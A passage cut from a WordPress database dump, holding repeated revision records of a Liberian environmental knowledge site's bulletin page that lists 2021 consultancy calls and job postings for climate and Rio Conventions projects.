individuals. The survey should utilize primary data collected through structured survey questionnaires. A random sample of professionals in institutions to test their awareness in the fields of climate change, biological conservation and land degradation.','REQUEST FOR EXPRESSION OF INTEREST: INDIVIDUAL INTERVIEWS TO GATHER ADDITIONAL INPUTS ON NATIONAL PRIORITIES AND CONSTRAINTS','','inherit','closed','closed','','3791-revision-v1','','','2021-08-18 16:11:29','2021-08-18 16:11:29','',3791,'https://ekmsliberia.info/?p=4104',0,'revision','',0),(4105,43,'2021-08-18 16:29:49','2021-08-18 16:29:49','<h2>You are on the EKMS Bulletin Board:</h2>		\n		<p>This bulletin provides a space for funding announcements, jobs, and other related openings.</p>		\n															<a href=\"https://ekmsliberia.info/ekms-bulletin/new-funding-opportunities-for-improving-lives-of-vulnerable-communities-in-africa/\">New Funding Opportunities for improving Lives of Vulnerable Communities in Africa</a><a href=\"https://ekmsliberia.info/2019/11/16/\"  ><time datetime=\"2019-11-16T15:27:23+00:00\" title=\"2019-11-16T15:27:23+00:00\">November 16, 2019</time></a>These amazing funding opportunities providing complete financial assistance to NGOs...','EKMS Bulletins','','inherit','closed','closed','','72-revision-v1','','','2021-08-18 16:29:49','2021-08-18 16:29:49','',72,'https://ekmsliberia.info/?p=4105',0,'revision','',0),(4106,43,'2021-08-18 16:29:49','2021-08-18 16:29:49','<h2>You are on the EKMS Bulletin Board:</h2>		\n		<p>This bulletin provides a space for funding announcements, jobs, and other related openings.</p>		\n															<a href=\"https://ekmsliberia.info/ekms-bulletin/new-funding-opportunities-for-improving-lives-of-vulnerable-communities-in-africa/\">New Funding Opportunities for improving Lives of Vulnerable Communities in Africa</a><a href=\"https://ekmsliberia.info/2019/11/16/\"  ><time datetime=\"2019-11-16T15:27:23+00:00\" title=\"2019-11-16T15:27:23+00:00\">November 16, 2019</time></a>These amazing funding opportunities providing complete financial assistance to NGOs...','EKMS Bulletins','','inherit','closed','closed','','72-revision-v1','','','2021-08-18 16:29:49','2021-08-18 16:29:49','',72,'https://ekmsliberia.info/?p=4106',0,'revision','',0),(4107,43,'2021-08-18 16:29:50','2021-08-18 16:29:50','<h2>You are on the EKMS Bulletin Board:</h2>		\n		<p>This bulletin provides a space for funding announcements, jobs, and other related openings.</p>		\n															<a href=\"https://ekmsliberia.info/ekms-bulletin/request-for-expression-of-interest-individual-interviews-to-gather-additional-inputs-on-national-priorities-and-constraints/\">REQUEST FOR EXPRESSION OF INTEREST: INDIVIDUAL INTERVIEWS TO GATHER ADDITIONAL INPUTS ON NATIONAL PRIORITIES AND CONSTRAINTS</a><a href=\"https://ekmsliberia.info/2021/08/03/\"  ><time datetime=\"2021-08-03T15:11:21+00:00\" title=\"2021-08-03T15:11:21+00:00\">August 3, 2021</time></a>The consultancy aims to examine the awareness level among individuals...\n															<a href=\"https://ekmsliberia.info/ekms-bulletin/request-for-expression-of-interest-a-survey-to-assess-public-awareness-of-the-importance-of-the-rio-conventions/\">Request for Expression of Interest: A SURVEY TO ASSESS PUBLIC AWARENESS OF THE IMPORTANCE OF THE RIO CONVENTIONS</a><a href=\"https://ekmsliberia.info/2021/08/03/\"  ><time datetime=\"2021-08-03T15:09:39+00:00\" title=\"2021-08-03T15:09:39+00:00\">August 3, 2021</time></a>The consultancy aims to examine the awareness level among Liberians...\n															<a href=\"https://ekmsliberia.info/ekms-bulletin/request-for-expression-of-interest-for-airing-of-jingles-and-public-service-announcements/\">Request for Expression of Interest For Airing of Jingles and Public Service Announcements</a><a href=\"https://ekmsliberia.info/2021/08/03/\"  ><time datetime=\"2021-08-03T15:06:09+00:00\" title=\"2021-08-03T15:06:09+00:00\">August 3, 2021</time></a>This project is in line with the GEF-6 CCCD Strategy...\n															<a href=\"https://ekmsliberia.info/ekms-bulletin/chief-technical-advisor-wanted-for-cccd-project-at-epa/\">Chief Technical Advisor Wanted For CCCD Project At EPA</a><a href=\"https://ekmsliberia.info/2021/08/03/\"  ><time datetime=\"2021-08-03T15:03:26+00:00\" title=\"2021-08-03T15:03:26+00:00\">August 3, 2021</time></a>The UNDP through the EPA as Implementing Entity (IE) intends...\n															<a href=\"https://ekmsliberia.info/ekms-bulletin/request-for-expression-of-interest-draft-thematic-assessments/\">Request for Expression of Interest: Draft Thematic Assessments</a><a href=\"https://ekmsliberia.info/2021/08/03/\"  ><time datetime=\"2021-08-03T15:01:19+00:00\" title=\"2021-08-03T15:01:19+00:00\">August 3, 2021</time></a>Liberia as a Party to the Rio Conventions, namely the...','EKMS Bulletins','','inherit','closed','closed','','72-revision-v1','','','2021-08-18 16:29:50','2021-08-18 16:29:50','',72,'https://ekmsliberia.info/?p=4107',0,'revision','',0),(4108,43,'2021-08-18 16:37:19','2021-08-18 16:37:19','','Bulletins-loop','','inherit','closed','closed','','4096-revision-v1','','','2021-08-18 16:37:19','2021-08-18 16:37:19','',4096,'https://ekmsliberia.info/?p=4108',0,'revision','',0),(4109,43,'2021-08-18 16:37:19','2021-08-18 16:37:19','','Bulletins-loop','','inherit','closed','closed','','4096-revision-v1','','','2021-08-18 16:37:19','2021-08-18 16:37:19','',4096,'https://ekmsliberia.info/?p=4109',0,'revision','',0),(4110,43,'2021-08-18 16:40:58','2021-08-18 16:40:58','','Bulletins-loop','','inherit','closed','closed','','4096-revision-v1','','','2021-08-18 16:40:58','2021-08-18 16:40:58','',4096,'https://ekmsliberia.info/?p=4110',0,'revision','',0),(4111,43,'2021-08-18 16:42:25','2021-08-18 16:42:25','<h2>You are on the EKMS Bulletin Board:</h2>		\n		<p>This bulletin provides a space for funding announcements, jobs, and other related openings.</p>		\n															<a href=\"https://ekmsliberia.info/ekms-bulletin/request-for-expression-of-interest-individual-interviews-to-gather-additional-inputs-on-national-priorities-and-constraints/\">REQUEST FOR EXPRESSION OF INTEREST: INDIVIDUAL INTERVIEWS TO GATHER ADDITIONAL INPUTS ON NATIONAL PRIORITIES AND CONSTRAINTS</a><a href=\"https://ekmsliberia.info/2021/08/03/\"  ><time datetime=\"2021-08-03T15:11:21+00:00\" title=\"2021-08-03T15:11:21+00:00\">August 3, 2021</time></a>The consultancy aims to examine the awareness level among individuals...\n															<a href=\"https://ekmsliberia.info/ekms-bulletin/request-for-expression-of-interest-a-survey-to-assess-public-awareness-of-the-importance-of-the-rio-conventions/\">Request for Expression of Interest: A SURVEY TO ASSESS PUBLIC AWARENESS OF THE IMPORTANCE OF THE RIO CONVENTIONS</a><a href=\"https://ekmsliberia.info/2021/08/03/\"  ><time datetime=\"2021-08-03T15:09:39+00:00\" title=\"2021-08-03T15:09:39+00:00\">August 3, 2021</time></a>The consultancy aims to examine the awareness level among Liberians...\n															<a href=\"https://ekmsliberia.info/ekms-bulletin/request-for-expression-of-interest-for-airing-of-jingles-and-public-service-announcements/\">Request for Expression of Interest For Airing of Jingles and Public Service Announcements</a><a href=\"https://ekmsliberia.info/2021/08/03/\"  ><time datetime=\"2021-08-03T15:06:09+00:00\" title=\"2021-08-03T15:06:09+00:00\">August 3, 2021</time></a>This project is in line with the GEF-6 CCCD Strategy...\n															<a href=\"https://ekmsliberia.info/ekms-bulletin/chief-technical-advisor-wanted-for-cccd-project-at-epa/\">Chief Technical Advisor Wanted For CCCD Project At EPA</a><a href=\"https://ekmsliberia.info/2021/08/03/\"  ><time datetime=\"2021-08-03T15:03:26+00:00\" title=\"2021-08-03T15:03:26+00:00\">August 3, 2021</time></a>The UNDP through the EPA as Implementing Entity (IE) intends...\n															<a href=\"https://ekmsliberia.info/ekms-bulletin/request-for-expression-of-interest-draft-thematic-assessments/\">Request for Expression of Interest: Draft Thematic Assessments</a><a href=\"https://ekmsliberia.info/2021/08/03/\"  ><time datetime=\"2021-08-03T15:01:19+00:00\" title=\"2021-08-03T15:01:19+00:00\">August 3, 2021</time></a>Liberia as a Party to the Rio Conventions, namely the...','EKMS Bulletins','','inherit','closed','closed','','72-revision-v1','','','2021-08-18 16:42:25','2021-08-18 16:42:25','',72,'https://ekmsliberia.info/?p=4111',0,'revision','',0),(4112,43,'2021-08-18 16:42:25','2021-08-18 16:42:25','<h2>You are on the EKMS Bulletin Board:</h2>		\n		<p>This bulletin provides a space for funding announcements, jobs, and other related openings.</p>		\n															<a href=\"https://ekmsliberia.info/ekms-bulletin/request-for-expression-of-interest-individual-interviews-to-gather-additional-inputs-on-national-priorities-and-constraints/\">REQUEST FOR EXPRESSION OF INTEREST: INDIVIDUAL INTERVIEWS TO GATHER ADDITIONAL INPUTS ON NATIONAL PRIORITIES AND CONSTRAINTS</a><a href=\"https://ekmsliberia.info/2021/08/03/\"  ><time datetime=\"2021-08-03T15:11:21+00:00\" title=\"2021-08-03T15:11:21+00:00\">August 3, 2021</time></a>The consultancy aims to examine the awareness level among individuals...\n															<a href=\"https://ekmsliberia.info/ekms-bulletin/request-for-expression-of-interest-a-survey-to-assess-public-awareness-of-the-importance-of-the-rio-conventions/\">Request for Expression of Interest: A SURVEY TO ASSESS PUBLIC AWARENESS OF THE IMPORTANCE OF THE RIO CONVENTIONS</a><a href=\"https://ekmsliberia.info/2021/08/03/\"  ><time datetime=\"2021-08-03T15:09:39+00:00\" title=\"2021-08-03T15:09:39+00:00\">August 3, 2021</time></a>The consultancy aims to examine the awareness level among Liberians...\n															<a href=\"https://ekmsliberia.info/ekms-bulletin/request-for-expression-of-interest-for-airing-of-jingles-and-public-service-announcements/\">Request for Expression of Interest For Airing of Jingles and Public Service Announcements</a><a href=\"https://ekmsliberia.info/2021/08/03/\"  ><time datetime=\"2021-08-03T15:06:09+00:00\" title=\"2021-08-03T15:06:09+00:00\">August 3, 2021</time></a>This project is in line with the GEF-6 CCCD Strategy...\n															<a href=\"https://ekmsliberia.info/ekms-bulletin/chief-technical-advisor-wanted-for-cccd-project-at-epa/\">Chief Technical Advisor Wanted For CCCD Project At EPA</a><a href=\"https://ekmsliberia.info/2021/08/03/\"  ><time datetime=\"2021-08-03T15:03:26+00:00\" title=\"2021-08-03T15:03:26+00:00\">August 3, 2021</time></a>The UNDP through the EPA as Implementing Entity (IE) intends...\n															<a href=\"https://ekmsliberia.info/ekms-bulletin/request-for-expression-of-interest-draft-thematic-assessments/\">Request for Expression of Interest: Draft Thematic Assessments</a><a href=\"https://ekmsliberia.info/2021/08/03/\"  ><time datetime=\"2021-08-03T15:01:19+00:00\" title=\"2021-08-03T15:01:19+00:00\">August 3, 2021</time></a>Liberia as a Party to the Rio Conventions, namely the...','EKMS Bulletins','','inherit','closed','closed','','72-revision-v1','','','2021-08-18 16:42:25','2021-08-18 16:42:25','',72,'https://ekmsliberia.info/?p=4112',0,'revision','',0),(4113,43,'2021-08-18 16:42:25','2021-08-18 16:42:25','<h2>You are on the EKMS Bulletin Board:</h2>		\n		<p>This bulletin provides a space for funding announcements, jobs, and other related openings.</p>		\n															<a href=\"https://ekmsliberia.info/ekms-bulletin/request-for-expression-of-interest-individual-interviews-to-gather-additional-inputs-on-national-priorities-and-constraints/\">REQUEST FOR EXPRESSION OF INTEREST: INDIVIDUAL INTERVIEWS TO GATHER ADDITIONAL INPUTS ON NATIONAL PRIORITIES AND CONSTRAINTS</a><a href=\"https://ekmsliberia.info/2021/08/03/\"  ><time datetime=\"2021-08-03T15:11:21+00:00\" title=\"2021-08-03T15:11:21+00:00\">August 3, 2021</time></a>The consultancy aims to examine the awareness level among individuals...\n															<a href=\"https://ekmsliberia.info/ekms-bulletin/request-for-expression-of-interest-a-survey-to-assess-public-awareness-of-the-importance-of-the-rio-conventions/\">Request for Expression of Interest: A SURVEY TO ASSESS PUBLIC AWARENESS OF THE IMPORTANCE OF THE RIO CONVENTIONS</a><a href=\"https://ekmsliberia.info/2021/08/03/\"  ><time datetime=\"2021-08-03T15:09:39+00:00\" title=\"2021-08-03T15:09:39+00:00\">August 3, 2021</time></a>The consultancy aims to examine the awareness level among Liberians...\n															<a href=\"https://ekmsliberia.info/ekms-bulletin/request-for-expression-of-interest-for-airing-of-jingles-and-public-service-announcements/\">Request for Expression of Interest For Airing of Jingles and Public Service Announcements</a><a href=\"https://ekmsliberia.info/2021/08/03/\"  ><time datetime=\"2021-08-03T15:06:09+00:00\" title=\"2021-08-03T15:06:09+00:00\">August 3, 2021</time></a>This project is in line with the GEF-6 CCCD Strategy...\n															<a href=\"https://ekmsliberia.info/ekms-bulletin/chief-technical-advisor-wanted-for-cccd-project-at-epa/\">Chief Technical Advisor Wanted For CCCD Project At EPA</a><a href=\"https://ekmsliberia.info/2021/08/03/\"  ><time datetime=\"2021-08-03T15:03:26+00:00\" title=\"2021-08-03T15:03:26+00:00\">August 3, 2021</time></a>The UNDP through the EPA as Implementing Entity (IE) intends...\n															<a href=\"https://ekmsliberia.info/ekms-bulletin/request-for-expression-of-interest-draft-thematic-assessments/\">Request for Expression of Interest: Draft Thematic Assessments</a><a href=\"https://ekmsliberia.info/2021/08/03/\"  ><time datetime=\"2021-08-03T15:01:19+00:00\" title=\"2021-08-03T15:01:19+00:00\">August 3, 2021</time></a>Liberia as a Party to the Rio Conventions, namely the...','EKMS Bulletins','','inherit','closed','closed','','72-revision-v1','','','2021-08-18 16:42:25','2021-08-18 16:42:25','',72,'https://ekmsliberia.info/?p=4113',0,'revision','',0),(4115,43,'2021-08-18 16:44:50','2021-08-18 16:44:50','','Bulletins-loop','','inherit','closed','closed','','4096-revision-v1','','','2021-08-18 16:44:50','2021-08-18 16:44:50','',4096,'https://ekmsliberia.info/?p=4115',0,'revision','',0),(4116,43,'2021-08-18 16:44:54','2021-08-18 16:44:54','<h2>You are on the EKMS Bulletin Board:</h2>		\n		<p>This bulletin provides a space for funding announcements, jobs, and other related openings.</p>		\n															<a href=\"https://ekmsliberia.info/ekms-bulletin/request-for-expression-of-interest-individual-interviews-to-gather-additional-inputs-on-national-priorities-and-constraints/\">REQUEST FOR EXPRESSION OF INTEREST: INDIVIDUAL INTERVIEWS TO GATHER ADDITIONAL INPUTS ON NATIONAL PRIORITIES AND CONSTRAINTS</a><a href=\"https://ekmsliberia.info/2021/08/03/\"  ><time datetime=\"2021-08-03T15:11:21+00:00\" title=\"2021-08-03T15:11:21+00:00\">August 3, 2021</time></a>The consultancy aims to examine the awareness level among individuals...\n															<a href=\"https://ekmsliberia.info/ekms-bulletin/request-for-expression-of-interest-a-survey-to-assess-public-awareness-of-the-importance-of-the-rio-conventions/\">Request for Expression of Interest: A SURVEY TO ASSESS PUBLIC AWARENESS OF THE IMPORTANCE OF THE RIO CONVENTIONS</a><a href=\"https://ekmsliberia.info/2021/08/03/\"  ><time datetime=\"2021-08-03T15:09:39+00:00\" title=\"2021-08-03T15:09:39+00:00\">August 3, 2021</time></a>The consultancy aims to examine the awareness level among Liberians...\n															<a href=\"https://ekmsliberia.info/ekms-bulletin/request-for-expression-of-interest-for-airing-of-jingles-and-public-service-announcements/\">Request for Expression of Interest For Airing of Jingles and Public Service Announcements</a><a href=\"https://ekmsliberia.info/2021/08/03/\"  ><time datetime=\"2021-08-03T15:06:09+00:00\" title=\"2021-08-03T15:06:09+00:00\">August 3, 2021</time></a>This project is in line with the GEF-6 CCCD Strategy...\n															<a href=\"https://ekmsliberia.info/ekms-bulletin/chief-technical-advisor-wanted-for-cccd-project-at-epa/\">Chief Technical Advisor Wanted For CCCD Project At EPA</a><a href=\"https://ekmsliberia.info/2021/08/03/\"  ><time datetime=\"2021-08-03T15:03:26+00:00\" title=\"2021-08-03T15:03:26+00:00\">August 3, 2021</time></a>The UNDP through the EPA as Implementing Entity (IE) intends...\n															<a href=\"https://ekmsliberia.info/ekms-bulletin/request-for-expression-of-interest-draft-thematic-assessments/\">Request for Expression of Interest: Draft Thematic Assessments</a><a href=\"https://ekmsliberia.info/2021/08/03/\"  ><time datetime=\"2021-08-03T15:01:19+00:00\" title=\"2021-08-03T15:01:19+00:00\">August 3, 2021</time></a>Liberia as a Party to the Rio Conventions, namely the...','EKMS Bulletins','','inherit','closed','closed','','72-revision-v1','','','2021-08-18 16:44:54','2021-08-18 16:44:54','',72,'https://ekmsliberia.info/?p=4116',0,'revision','',0),(4117,43,'2021-08-18 16:44:54','2021-08-18 16:44:54','<h2>You are on the EKMS Bulletin Board:</h2>		\n		<p>This bulletin provides a space for funding announcements, jobs, and other related openings.</p>		\n															<a href=\"https://ekmsliberia.info/ekms-bulletin/request-for-expression-of-interest-individual-interviews-to-gather-additional-inputs-on-national-priorities-and-constraints/\">REQUEST FOR EXPRESSION OF INTEREST: INDIVIDUAL INTERVIEWS TO GATHER ADDITIONAL INPUTS ON NATIONAL PRIORITIES AND CONSTRAINTS</a><a href=\"https://ekmsliberia.info/2021/08/03/\"  ><time datetime=\"2021-08-03T15:11:21+00:00\" title=\"2021-08-03T15:11:21+00:00\">August 3, 2021</time></a>The consultancy aims to examine the awareness level among individuals...\n															<a href=\"https://ekmsliberia.info/ekms-bulletin/request-for-expression-of-interest-a-survey-to-assess-public-awareness-of-the-importance-of-the-rio-conventions/\">Request for Expression of Interest: A SURVEY TO ASSESS PUBLIC AWARENESS OF THE IMPORTANCE OF THE RIO CONVENTIONS</a><a href=\"https://ekmsliberia.info/2021/08/03/\"  ><time datetime=\"2021-08-03T15:09:39+00:00\" title=\"2021-08-03T15:09:39+00:00\">August 3, 2021</time></a>The consultancy aims to examine the awareness level among Liberians...\n															<a href=\"https://ekmsliberia.info/ekms-bulletin/request-for-expression-of-interest-for-airing-of-jingles-and-public-service-announcements/\">Request for Expression of Interest For Airing of Jingles and Public Service Announcements</a><a href=\"https://ekmsliberia.info/2021/08/03/\"  ><time datetime=\"2021-08-03T15:06:09+00:00\" title=\"2021-08-03T15:06:09+00:00\">August 3, 2021</time></a>This project is in line with the GEF-6 CCCD Strategy...\n															<a href=\"https://ekmsliberia.info/ekms-bulletin/chief-technical-advisor-wanted-for-cccd-project-at-epa/\">Chief Technical Advisor Wanted For CCCD Project At EPA</a><a href=\"https://ekmsliberia.info/2021/08/03/\"  ><time datetime=\"2021-08-03T15:03:26+00:00\" title=\"2021-08-03T15:03:26+00:00\">August 3, 2021</time></a>The UNDP through the EPA as Implementing Entity (IE) intends...\n															<a href=\"https://ekmsliberia.info/ekms-bulletin/request-for-expression-of-interest-draft-thematic-assessments/\">Request for Expression of Interest: Draft Thematic Assessments</a><a href=\"https://ekmsliberia.info/2021/08/03/\"  ><time datetime=\"2021-08-03T15:01:19+00:00\" title=\"2021-08-03T15:01:19+00:00\">August 3, 2021</time></a>Liberia as a Party to the Rio Conventions, namely the...','EKMS Bulletins','','inherit','closed','closed','','72-revision-v1','','','2021-08-18 16:44:54','2021-08-18 16:44:54','',72,'https://ekmsliberia.info/?p=4117',0,'revision','',0),(4118,43,'2021-08-18 16:44:54','2021-08-18 16:44:54','<h2>You are on the EKMS Bulletin Board:</h2>		\n		<p>This bulletin provides a space for funding announcements, jobs, and other related openings.</p>		\n															<a href=\"https://ekmsliberia.info/ekms-bulletin/request-for-expression-of-interest-individual-interviews-to-gather-additional-inputs-on-national-priorities-and-constraints/\">REQUEST FOR EXPRESSION OF INTEREST: INDIVIDUAL INTERVIEWS TO GATHER ADDITIONAL INPUTS ON NATIONAL PRIORITIES AND CONSTRAINTS</a><a href=\"https://ekmsliberia.info/2021/08/03/\"  ><time datetime=\"2021-08-03T15:11:21+00:00\" title=\"2021-08-03T15:11:21+00:00\">August 3, 2021</time></a>The consultancy aims to examine the awareness level among individuals...\n															<a href=\"https://ekmsliberia.info/ekms-bulletin/request-for-expression-of-interest-a-survey-to-assess-public-awareness-of-the-importance-of-the-rio-conventions/\">Request for Expression of Interest: A SURVEY TO ASSESS PUBLIC AWARENESS OF THE IMPORTANCE OF THE RIO CONVENTIONS</a><a href=\"https://ekmsliberia.info/2021/08/03/\"  ><time datetime=\"2021-08-03T15:09:39+00:00\" title=\"2021-08-03T15:09:39+00:00\">August 3, 2021</time></a>The consultancy aims to examine the awareness level among Liberians...\n															<a href=\"https://ekmsliberia.info/ekms-bulletin/request-for-expression-of-interest-for-airing-of-jingles-and-public-service-announcements/\">Request for Expression of Interest For Airing of Jingles and Public Service Announcements</a><a href=\"https://ekmsliberia.info/2021/08/03/\"  ><time datetime=\"2021-08-03T15:06:09+00:00\" title=\"2021-08-03T15:06:09+00:00\">August 3, 2021</time></a>This project is in line with the GEF-6 CCCD Strategy...\n															<a href=\"https://ekmsliberia.info/ekms-bulletin/chief-technical-advisor-wanted-for-cccd-project-at-epa/\">Chief Technical Advisor Wanted For CCCD Project At EPA</a><a href=\"https://ekmsliberia.info/2021/08/03/\"  ><time datetime=\"2021-08-03T15:03:26+00:00\" title=\"2021-08-03T15:03:26+00:00\">August 3, 2021</time></a>The UNDP through the EPA as Implementing Entity (IE) intends...\n															<a href=\"https://ekmsliberia.info/ekms-bulletin/request-for-expression-of-interest-draft-thematic-assessments/\">Request for Expression of Interest: Draft Thematic Assessments</a><a href=\"https://ekmsliberia.info/2021/08/03/\"  ><time datetime=\"2021-08-03T15:01:19+00:00\" title=\"2021-08-03T15:01:19+00:00\">August 3, 2021</time></a>Liberia as a Party to the Rio Conventions, namely the...','EKMS Bulletins','','inherit','closed','closed','','72-revision-v1','','','2021-08-18 16:44:54','2021-08-18 16:44:54','',72,'https://ekmsliberia.info/?p=4118',0,'revision','',0),(4120,43,'2021-08-18 16:52:04','2021-08-18 16:52:04','<h2>You are on the EKMS Bulletin Board:</h2>		\n		<p>This bulletin provides a space for funding announcements, jobs, and other related openings.</p>		\n															<a href=\"https://ekmsliberia.info/ekms-bulletin/request-for-expression-of-interest-individual-interviews-to-gather-additional-inputs-on-national-priorities-and-constraints/\">REQUEST FOR EXPRESSION OF INTEREST: INDIVIDUAL INTERVIEWS TO GATHER ADDITIONAL INPUTS ON NATIONAL PRIORITIES AND CONSTRAINTS</a><a href=\"https://ekmsliberia.info/2021/08/03/\"  ><time datetime=\"2021-08-03T15:11:21+00:00\" title=\"2021-08-03T15:11:21+00:00\">August 3, 2021</time></a>The consultancy aims to examine the awareness level among individuals...\n															<a href=\"https://ekmsliberia.info/ekms-bulletin/request-for-expression-of-interest-a-survey-to-assess-public-awareness-of-the-importance-of-the-rio-conventions/\">Request for Expression of Interest: A SURVEY TO ASSESS PUBLIC AWARENESS OF THE IMPORTANCE OF THE RIO CONVENTIONS</a><a href=\"https://ekmsliberia.info/2021/08/03/\"  ><time datetime=\"2021-08-03T15:09:39+00:00\" title=\"2021-08-03T15:09:39+00:00\">August 3, 2021</time></a>The consultancy aims to examine the awareness level among Liberians...\n															<a href=\"https://ekmsliberia.info/ekms-bulletin/request-for-expression-of-interest-for-airing-of-jingles-and-public-service-announcements/\">Request for Expression of Interest For Airing of Jingles and Public Service Announcements</a><a href=\"https://ekmsliberia.info/2021/08/03/\"  ><time datetime=\"2021-08-03T15:06:09+00:00\" title=\"2021-08-03T15:06:09+00:00\">August 3, 2021</time></a>This project is in line with the GEF-6 CCCD Strategy...\n															<a href=\"https://ekmsliberia.info/ekms-bulletin/chief-technical-advisor-wanted-for-cccd-project-at-epa/\">Chief Technical Advisor Wanted For CCCD Project At EPA</a><a href=\"https://ekmsliberia.info/2021/08/03/\"  ><time datetime=\"2021-08-03T15:03:26+00:00\" title=\"2021-08-03T15:03:26+00:00\">August 3, 2021</time></a>The UNDP through the EPA as Implementing Entity (IE) intends...\n															<a href=\"https://ekmsliberia.info/ekms-bulletin/request-for-expression-of-interest-draft-thematic-assessments/\">Request for Expression of Interest: Draft Thematic Assessments</a><a href=\"https://ekmsliberia.info/2021/08/03/\"  ><time datetime=\"2021-08-03T15:01:19+00:00\" title=\"2021-08-03T15:01:19+00:00\">August 3, 2021</time></a>Liberia as a Party to the Rio Conventions, namely the...','EKMS Bulletins','','inherit','closed','closed','','72-revision-v1','','','2021-08-18 16:52:04','2021-08-18 16:52:04','',72,'https://ekmsliberia.info/?p=4120',0,'revision','',0),(4121,43,'2021-08-18 16:52:04','2021-08-18 16:52:04','<h2>You are on the EKMS Bulletin Board:</h2>		\n		<p>This bulletin provides a space for funding announcements, jobs, and other related openings.</p>		\n															<a href=\"https://ekmsliberia.info/ekms-bulletin/request-for-expression-of-interest-individual-interviews-to-gather-additional-inputs-on-national-priorities-and-constraints/\">REQUEST FOR EXPRESSION OF INTEREST: INDIVIDUAL INTERVIEWS TO GATHER ADDITIONAL INPUTS ON NATIONAL PRIORITIES AND CONSTRAINTS</a><a href=\"https://ekmsliberia.info/2021/08/03/\"  ><time datetime=\"2021-08-03T15:11:21+00:00\" title=\"2021-08-03T15:11:21+00:00\">August 3, 2021</time></a>The consultancy aims to examine the awareness level among individuals...\n															<a href=\"https://ekmsliberia.info/ekms-bulletin/request-for-expression-of-interest-a-survey-to-assess-public-awareness-of-the-importance-of-the-rio-conventions/\">Request for Expression of Interest: A SURVEY TO ASSESS PUBLIC AWARENESS OF THE IMPORTANCE OF THE RIO CONVENTIONS</a><a href=\"https://ekmsliberia.info/2021/08/03/\"  ><time datetime=\"2021-08-03T15:09:39+00:00\" title=\"2021-08-03T15:09:39+00:00\">August 3, 2021</time></a>The consultancy aims to examine the awareness level among Liberians...\n															<a href=\"https://ekmsliberia.info/ekms-bulletin/request-for-expression-of-interest-for-airing-of-jingles-and-public-service-announcements/\">Request for Expression of Interest For Airing of Jingles and Public Service Announcements</a><a href=\"https://ekmsliberia.info/2021/08/03/\"  ><time datetime=\"2021-08-03T15:06:09+00:00\" title=\"2021-08-03T15:06:09+00:00\">August 3, 2021</time></a>This project is in line with the GEF-6 CCCD Strategy...\n															<a href=\"https://ekmsliberia.info/ekms-bulletin/chief-technical-advisor-wanted-for-cccd-project-at-epa/\">Chief Technical Advisor Wanted For CCCD Project At EPA</a><a href=\"https://ekmsliberia.info/2021/08/03/\"  ><time datetime=\"2021-08-03T15:03:26+00:00\" title=\"2021-08-03T15:03:26+00:00\">August 3, 2021</time></a>The UNDP through the EPA as Implementing Entity (IE) intends...\n															<a href=\"https://ekmsliberia.info/ekms-bulletin/request-for-expression-of-interest-draft-thematic-assessments/\">Request for Expression of Interest: Draft Thematic Assessments</a><a href=\"https://ekmsliberia.info/2021/08/03/\"  ><time datetime=\"2021-08-03T15:01:19+00:00\" title=\"2021-08-03T15:01:19+00:00\">August 3, 2021</time></a>Liberia as a Party to the Rio Conventions, namely the...','EKMS Bulletins','','inherit','closed','closed','','72-revision-v1','','','2021-08-18 16:52:04','2021-08-18 16:52:04','',72,'https://ekmsliberia.info/?p=4121',0,'revision','',0),(4122,43,'2021-08-18 16:52:05','2021-08-18 16:52:05','<h2>You are on the EKMS Bulletin Board:</h2>		\n		<p>This bulletin provides a space for funding announcements, jobs, and other related openings.</p>		\n															<a href=\"https://ekmsliberia.info/ekms-bulletin/request-for-expression-of-interest-individual-interviews-to-gather-additional-inputs-on-national-priorities-and-constraints/\">REQUEST FOR EXPRESSION OF INTEREST: INDIVIDUAL INTERVIEWS TO GATHER ADDITIONAL INPUTS ON NATIONAL PRIORITIES AND CONSTRAINTS</a><a href=\"https://ekmsliberia.info/2021/08/03/\"  ><time datetime=\"2021-08-03T15:11:21+00:00\" title=\"2021-08-03T15:11:21+00:00\">August 3, 2021</time></a>The consultancy aims to examine the awareness level among individuals...\n															<a href=\"https://ekmsliberia.info/ekms-bulletin/request-for-expression-of-interest-a-survey-to-assess-public-awareness-of-the-importance-of-the-rio-conventions/\">Request for Expression of Interest: A SURVEY TO ASSESS PUBLIC AWARENESS OF THE IMPORTANCE OF THE RIO CONVENTIONS</a><a href=\"https://ekmsliberia.info/2021/08/03/\"  ><time datetime=\"2021-08-03T15:09:39+00:00\" title=\"2021-08-03T15:09:39+00:00\">August 3, 2021</time></a>The consultancy aims to examine the awareness level among Liberians...\n															<a href=\"https://ekmsliberia.info/ekms-bulletin/request-for-expression-of-interest-for-airing-of-jingles-and-public-service-announcements/\">Request for Expression of Interest For Airing of Jingles and Public Service Announcements</a><a href=\"https://ekmsliberia.info/2021/08/03/\"  ><time datetime=\"2021-08-03T15:06:09+00:00\" title=\"2021-08-03T15:06:09+00:00\">August 3, 2021</time></a>This project is in line with the GEF-6 CCCD Strategy...\n															<a href=\"https://ekmsliberia.info/ekms-bulletin/chief-technical-advisor-wanted-for-cccd-project-at-epa/\">Chief Technical Advisor Wanted For CCCD Project At EPA</a><a href=\"https://ekmsliberia.info/2021/08/03/\"  ><time datetime=\"2021-08-03T15:03:26+00:00\" title=\"2021-08-03T15:03:26+00:00\">August 3, 2021</time></a>The UNDP through the EPA as Implementing Entity (IE) intends...\n															<a href=\"https://ekmsliberia.info/ekms-bulletin/request-for-expression-of-interest-draft-thematic-assessments/\">Request for Expression of Interest: Draft Thematic Assessments</a><a href=\"https://ekmsliberia.info/2021/08/03/\"  ><time datetime=\"2021-08-03T15:01:19+00:00\" title=\"2021-08-03T15:01:19+00:00\">August 3, 2021</time></a>Liberia as a Party to the Rio Conventions, namely the...','EKMS Bulletins','','inherit','closed','closed','','72-revision-v1','','','2021-08-18 16:52:05','2021-08-18 16:52:05','',72,'https://ekmsliberia.info/?p=4122',0,'revision','',0),(4123,43,'2021-08-18 16:55:46','2021-08-18 16:55:46','<h2>You are on the EKMS Bulletin Board:</h2>		\n		<p>This bulletin provides a space for funding announcements, jobs, and other related openings.</p>		\n															<a href=\"https://ekmsliberia.info/ekms-bulletin/request-for-expression-of-interest-individual-interviews-to-gather-additional-inputs-on-national-priorities-and-constraints/\">REQUEST FOR EXPRESSION OF INTEREST: INDIVIDUAL INTERVIEWS TO GATHER ADDITIONAL INPUTS ON NATIONAL PRIORITIES AND CONSTRAINTS</a><a href=\"https://ekmsliberia.info/2021/08/03/\"  ><time datetime=\"2021-08-03T15:11:21+00:00\" title=\"2021-08-03T15:11:21+00:00\">August 3, 2021</time></a>The consultancy aims to examine the awareness level among individuals...\n															<a 